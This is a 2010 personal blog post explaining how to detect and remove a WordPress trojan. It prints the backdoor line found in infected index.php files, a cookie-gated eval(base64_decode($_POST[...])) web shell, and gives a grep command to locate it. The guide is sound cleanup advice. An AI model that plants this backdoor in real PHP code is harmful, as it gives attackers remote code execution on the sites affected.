-
Pages
Twitter
- The decision to have Weinerschnitzel for dinner is one that I now der-gret. 2010/09/02
- Thanks to some poor behavior (see: complaining on the internet) my blog is now effortlessly backing up on @VaultPress. Glad I threw a fit! 2010/09/02
- @VaultPress: Thanks! If I knew that being snarky on the internet would get me things, I would have started doing it a long time ago. ;) 2010/09/02
- <grumpy>I wish @VaultPress would quit retweeting testimonials and get around to sending me a damn invite.</grumpy> 2010/09/02
-
Foursquare
Archives
- August 2010
- March 2010
- February 2010
- January 2010
- November 2009
- August 2009
- June 2009
- February 2009
- January 2009
- December 2008
- November 2008
- October 2008
- September 2008
- August 2008
- July 2008
- June 2008
- May 2008
- April 2008
- March 2008
- January 2008
- December 2007
- November 2007
- October 2007
- September 2007
- August 2007
- July 2007
- June 2007
- May 2007
- April 2007
- March 2007
- February 2007
- January 2007
- December 2006
- November 2006
- October 2006
- September 2006
- August 2006
- July 2006
- June 2006
- May 2006
- April 2006
- March 2006
- February 2006
- January 2006
- December 2005
- November 2005
- October 2005
- September 2005
Goodbye Horses
So I’ve been helping a few folks out with a Trojan that has been cropping up in a handful of WordPress installs as of late. Currently, it has been getting noticed by the good little girls and boys on Windows with virus scanners installed. When visiting an infected site, most folks are being prompted to download:
Don’t go there tho! The virus scanners identify the contents of that URL as JS:Packed-L, a packed JavaScript exploit.
So how do you find out if your install has been hit? Well, the ones I’ve been cleaning up all have the following bit of code right at the top of their main index.php:
<?php if(md5($_COOKIE['0bdcf3981272c15a'])=="23c8932280dcafe25c20c6d25c9c8660"){ eval(base64_decode($_POST['file'])); exit; } ?>If you see that floating around, get rid of it! Once you’ve done that, clear out your site’s cache — if you’re using a caching plugin, that is — and you should be good to go.
Should you not find that bit of code hanging around in your install’s index.php and there are people still complaining about it, I suggest getting shell access — so long as your web host is awesome and gives you that — and doing a recursive grep. At DreamHost, this is as easy as logging in and running:
grep -R 0bdcf3981272c15a /home/user/example.com/*Of course you’ll want to replace “user” with your username and “example.com” with the domain — or folder if you broke from standard naming conventions — where WordPress is installed. Give that command a few minutes to run and you should get a path of where that code snippet can be found. All you have to do at that point is purge it and clear any cache you might have on your WP install.
Of course, if you managed to get hit with this, it was because there was a hole in your WordPress install. Making sure your core install and plugins are up to date is always a great idea. I check mine daily — but even doing it once a week is better than most folks.
All I’m saying is that you have to stay militant. Doing so will seriously prevent the headaches of having to deal with fixing this crap on a regular basis.